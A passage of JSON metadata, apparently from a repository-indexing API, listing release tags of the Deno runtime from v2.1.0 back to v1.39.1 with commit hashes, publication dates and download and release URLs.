arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://r